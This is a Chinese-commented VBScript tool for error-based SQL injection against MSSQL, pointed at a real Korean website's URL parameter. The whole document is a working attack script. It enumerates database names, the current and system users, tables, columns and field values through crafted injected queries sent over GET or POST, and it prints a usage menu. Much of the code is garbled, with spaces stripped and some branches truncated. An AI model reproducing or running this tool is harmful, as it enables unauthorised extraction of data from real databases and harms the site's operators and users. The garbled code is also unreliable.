作者:Tr4c3
'为了保持脚本的通用性,放弃了and(selectcol_name(object_id('TableName'),N))=0这样的用法。
'欲返回韩文等字符可修改121或者136行,更多的设置要自己修改
'更多功能请大家自己加入 Constmethod="Get"'提交方式请修改此处,有get和post可选
ConstDisPlay="D"'S保存到文件,D输出到屏幕 DimstrUrl_B,strUrl,i,k,MyArray,strArg,strD strUrl_B="http://onedu.mk.co.kr/02_process/cata1_2.asp?kwajung_code=120'"'基于注射点的不确定性,此处请手工更改
i=1'库的基数
k=0'表和字段的基数
MyArray=Split(strUrl_B,"?",-1,1)
strUrl=MyArray(0)'取url
strArg=MyArray(1)'取参数
SetArgs=Wscript.Arguments IfArgs.Count=0Then
ShowU
EndIf
'IfArgs.Count=1AndLCase(Args(0)) '****
'爆库
'****
IfArgs.Count=1Then
IfLCase(Trim(Args(0)))="databases"Then
ResuT("---------------===============================--------------")
ResuT("AllTheDataBases:") Do
strData="andquotename(db_name("&i&"))=0--"
sqlInj(strData)
i=i+1
LoopUntilStrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
ElseIfLCase(Trim(Args(0)))="info"then
ResuT("---------------===============================--------------")
ResuT("TheCurrentDatabaseis:")
strData="andquotename(db_name())=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
ResuT("ThedatabaseUseris:")
strData="andquotename(user)=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
ResuT("TheSystem_useris:")
strData="andquotename(System_user)=0--"
sqlInj(strData)
ResuT("---------------===============================--------------")
Wscript.Quit
EndIf
EndIf
'****
'爆表
'****
IfArgs.Count=2AndLCase(Trim(Args(1)))="tables"Then
ResuT("---------------===============================--------------")
ResuT("TheTablesOf"&Args(0))
Do
strData="and(selecttop1quotename(name)from"&Args(0)&".dbo.sysobjectswherextype=char(85)ANDnamenotin(selecttop"&k&"namefrom"&Args(0)&".dbo.sysobjectswherextype=char(85)))=0--"
sqlInj(strData)
k=k+1
LoopUntilStrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
EndIf '****
'爆字段
'****
IfArgs.Count=3AndLCase(Trim(Args(2)))="cols"Then
Database=Args(0)
Table=Args(1)
TarGet=DataBase&".dbo."&Table
TarGetCol=Database&".DBO.SYSCOLUMNS"
ResuT("---------------===============================--------------")
ResuT("TheColumnsOf"&TarGet)
Do
strData="and(selecttop1Quotename(name)from"&TarGetCol&"whereid=object_id('"&TarGet&"')andnamenotin(selecttop"&k&"namefrom"&TarGetCol&"whereid=object_id('"&TarGet&"')))=0--"
sqlInj(strData)
k=k+1
LoopUntilStrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
EndIf '****
'爆字段值
'****
IfArgs.Count=4AndLCase(Trim(Args(3)))="values"Then
Database=Args(0)
Table=Args(1)
col=Args(2)
Target=Database&".dbo."&Table
ResuT("---------------===============================--------------")
ResuT("TheValuesOf"&Args(2)&"in"&Target)
Do
strData="and(selecttop1quotename("&col&")from"&Target&"where"&col&"notin(selecttop"&k&""&col&"from"&Target&"))=0--"
sqlInj(strData)
k=k+1
LoopUntilStrD=""
ResuT("---------------===============================--------------")
Wscript.Quit
EndIf SubsqlInj(value)
IfUCase(method)="GET"Then
value=strArg&value
SetobjXML=CreateObject("Microsoft.XMLHTTP")
objXML.Open"GET",strUrl&"?"&value,False
objXML.SetRequestHeader"Referer",strUrl
'objXML.SetRequestHeader"Accept-Language","EUC-KR"
objXML.send()
strRevS=objXML.ResponseText'默认用这个
'strRevS=bytes2BSTR(objXML.ResponseBody)'韩文有时候要用这个
IfInStr(strRevS,"'[")<>0AndInStr(strRevs,"]'")<>0Then
strD=Mid(strRevS,InStr(strRevS,"'[")+2,InStr(strRevs,"]'")-Instr(strRevS,"'[")-2)
ResuT("|"&strD)
Else
strD=""
EndIf
ElseIfUCase(method)="POST"Then
value=strArg&value
SetobjXML=CreateObject("Microsoft.XMLHTTP")
objXML.Open"POST",False
objXML.SetRequestHeader"Content-Type","application/x-www-form-urlencoded"
objXML.SetRequestHeader"Referer",strUrl
objXML.send(UrlEncode(value))
strRevS=objXML.ResponseText'默认用这个
'strRevS=bytes2BSTR(objXML.ResponseBody)'韩文有时候要用这个
IfInStr(strRevS,"'[")-2)
ResuT("|"&strD)
Else
strD=""
EndIf
EndIf
EndSub FunctionResuT(strInfo)
IfUCase(DisPlay)="S"Then
Setfso=CreateObject("Scripting.FileSystemObject")
Setfso1=fso.OpenTextFile("result.txt",8,True)
fso1.WriteLine(strInfo)
fso1.Close
Setfso=Nothing
ElseIfUCase(DisPlay)="D"Then
Wscript.Echo(strInfo)
EndIf
EndFunction FunctionUrlEncode(str)
str=Replace(str,"","+")
UrlEncode=str
EndFunction Functionbytes2BSTR(vIn)
strReturn=""
Fori=1ToLenB(vIn)
ThisCharCode=AscB(MidB(vIn,1))
IfThisCharCode<&H80Then
strReturn=strReturn&Chr(ThisCharCode)
Else
NextCharCode=AscB(MidB(vIn,i+1,1))
strReturn=strReturn&Chr(CLng(ThisCharCode)*&H100+CInt(NextCharCode))
i=i+1
EndIf
Next
bytes2BSTR=strReturn
EndFunction SubshowU()
WithWscript
.Echo("+--------------------------=====================------------------------------+")
.Echo("sql2005注射辅助脚本(粗糙版),用于mssql显错模式ByTr4c3[at]126[Dot]com")
.Echo("Usage:")
.Echo("cscript"&.ScriptName&"info--爆基本信息")
.Echo("cscript"&.ScriptName&"databases--爆所有库名")
.Echo("cscript"&.ScriptName&"pubstables--爆库pubs里所有用户表名")
.Echo("cscript"&.ScriptName&"pubsauthorscols--爆库pubs里authors表的所有字段名")
.Echo("cscript"&.ScriptName&"pubsauthorsau_idvalues--爆pubs.dbo.authors里au_id的值")
.Echo("+--------------------------=====================------------------------------+")
.Quit
Endwith
EndSub